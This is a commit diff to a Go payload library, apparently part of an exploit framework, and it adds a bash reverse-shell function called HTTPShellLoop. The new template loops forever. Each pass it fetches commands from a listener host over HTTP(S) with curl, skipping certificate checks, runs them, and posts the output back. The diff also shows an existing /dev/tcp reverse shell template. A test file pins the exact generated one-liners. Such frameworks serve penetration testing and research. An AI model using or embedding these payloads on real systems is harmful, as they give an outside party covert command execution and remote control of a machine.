Add shell script loop payload for HTTPServeShell

payload/reverse/bash.go

@@ -7,6 +7,7 @@ import (
 const (
 	BashDefault        = BashTCPRedirection
 	BashTCPRedirection = `bash -c 'bash &> /dev/tcp/%s/%d <&1'`
+	BashHTTPShellLoop  = `bash -c 'while :; do curl -d "$(bash -c "$(curl %s-H"VC-Auth: %s" %s://%s:%d || exit)")" %s-H"VC-Auth: %s" %s://%s:%d/rx ||exit;sleep 1;done'`
 )
 
 // The default payload type for reverse bash utilizes the pseudo-dev networking redirects in default bash.
@@ -18,3 +19,15 @@ func (bash *BashPayload) Default(lhost string, lport int) string {
 func (bash *BashPayload) TCPRedirection(lhost string, lport int) string {
 	return fmt.Sprintf(BashDefault, lhost, lport)
 }
+
+// An infinite loop shell script that will stay running until the HTTP server fails to respond.
+// This fits the c2.HTTPShellServer C2 logic in a shell script form.
+func (bash *BashPayload) HTTPShellLoop(lhost string, lport int, ssl bool, auth string) string {
+	k := ``
+	h := `http`
+	if ssl {
+		h = "https"
+		k = `-k `
+	}
+	return fmt.Sprintf(BashHTTPShellLoop, k, auth, h, lhost, lport, k, auth, h, lhost, lport)
+}

payload/reverse/reverse_test.go

@@ -24,6 +24,22 @@ func TestBashDefault(t *testing.T) {
 	t.Log(payload)
 }
 
+func TestBashHTTPShellLoop(t *testing.T) {
+	payload := reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, true, "vulncheck")
+
+	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444 || exit)")" -k -H"VC-Auth: vulncheck" https://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+		t.Fatal(payload)
+	}
+
+	payload = reverse.Bash.HTTPShellLoop("127.0.0.1", 4444, false, "vulncheck")
+
+	if payload != `bash -c 'while :; do curl -d "$(bash -c "$(curl -H"VC-Auth: vulncheck" http://127.0.0.1:4444 || exit)")" -H"VC-Auth: vulncheck" http://127.0.0.1:4444/rx ||exit;sleep 1;done'` {
+		t.Fatal(payload)
+	}
+
+	t.Log(payload)
+}
+
 func TestNetcatGaping(t *testing.T) {
 	payload := reverse.Netcat.Default("127.0.0.1", 4444)